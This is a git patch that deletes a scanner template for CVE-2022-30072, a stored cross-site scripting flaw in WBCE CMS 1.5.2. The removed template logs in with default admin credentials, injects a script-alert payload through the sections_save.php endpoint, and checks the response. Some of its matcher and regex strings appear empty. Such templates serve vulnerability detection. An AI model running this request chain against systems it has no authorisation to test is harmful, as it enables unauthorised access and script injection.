From 10d7609103ddd81883f80fb4622b9379d0739eb0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 10 Jul 2022 11:07:36 +0530 Subject: [PATCH] Delete CVE-2022-30072.yaml --- cves/2022/CVE-2022-30072.yaml | 73 ----------------------------------- 1 file changed, 73 deletions(-) delete mode 100644 cves/2022/CVE-2022-30072.yaml diff --git a/cves/2022/CVE-2022-30072.yaml b/cves/2022/CVE-2022-30072.yaml deleted file mode 100644 index 42c2174d4b..0000000000 --- a/cves/2022/CVE-2022-30072.yaml +++ /dev/null @@ -1,73 +0,0 @@ -id: CVE-2022-30072 - -info: - name: WBCE CMS v1.5.2 XSS Stored - author: arafatansari - severity: medium - description: | - WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\pages\sections_save.php namesection2 parameters. - reference: - - https://github.com/APTX-4879/CVE - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30072 - metadata: - verified: true - tags: wbcecms,xss - -requests: - - raw: - - | - POST /wbcecms/wbce/admin/login/index.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login - - - | - GET /wbcecms/wbce/admin/users/index.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - | - POST /wbcecms/wbce/admin/pages/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - formtoken={{formtoken}}&title=final&type=wysiwyg&parent=0&visibility=public&save= - - - | - POST /wbcecms/wbce/admin/pages/sections_save.php?page_id=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - formtoken={{formtoken}}&page_id=1§ion_id=1&block1=1&namesection1=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&start_date1=04.07.2022+15%3A46&end_date1=19.07.2022+15%3A46&saveandback=saveandback - - - | - GET /wbcecms/wbce/admin/pages/modify.php?page_id=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - cookie-reuse: true - extractors: - - type: regex # type of extractor - name: formtoken # defining the variable name - part: body # part of response to look for - group: 1 - regex: - - '' - internal: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200